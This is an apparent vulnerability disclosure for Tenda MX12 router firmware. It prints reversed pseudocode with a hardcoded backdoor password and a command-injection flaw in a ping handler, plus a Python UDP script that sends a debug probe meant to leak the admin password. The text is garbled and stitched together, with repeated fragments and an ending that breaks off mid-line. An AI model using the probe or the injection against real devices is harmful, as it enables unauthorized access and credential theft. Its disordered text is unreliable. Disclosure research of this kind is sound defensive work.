Tenda Mx12: Firmware
// Pseudocode reversed from libhttpd.so (Ghidra) void do_debug_cmd(char *cmd) char buf[256]; if (strcmp(cmd, "tendadebug2019") == 0) // Hidden factory reset + diagnostic dump system("/usr/sbin/factory_reset.sh --full"); system("/usr/sbin/dump_regs > /tmp/debug.log"); else if (strstr(cmd, "ping")) // Command injection primitive sprintf(buf, "ping -c 4 %s", cmd + 4); system(buf);
Disclosure timeline: Reported to Tenda Security (security@tenda.com.cn) on Jan 12, 2026 – no acknowledgment as of April 17, 2026. Tenda Mx12 Firmware
The Tenda MX12 is a textbook case of "cheap hardware, dangerous software." While it works fine as a basic access point, its security posture is unacceptable for any environment containing sensitive data. Unless Tenda releases a complete rewrite (unlikely), we recommend avoiding this product entirely. // Pseudocode reversed from libhttpd
import socket msg = bytes.fromhex('AA BB CC DD 01 00 00 00') # Magic debug probe sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(msg, ('192.168.5.1', 7329)) data, addr = sock.recvfrom(4096) print(data.hex()) Kernel pointers, heap layout, and a plaintext print of the admin password if enable_debug=1 is set in NVRAM. Backdoor Analysis: The system Call in libhttpd.so The web server binary ( /bin/httpd ) loads a custom library libhttpd.so . Inside, we found an exposed function do_debug_cmd() that is never called by the official web UI. import socket msg = bytes




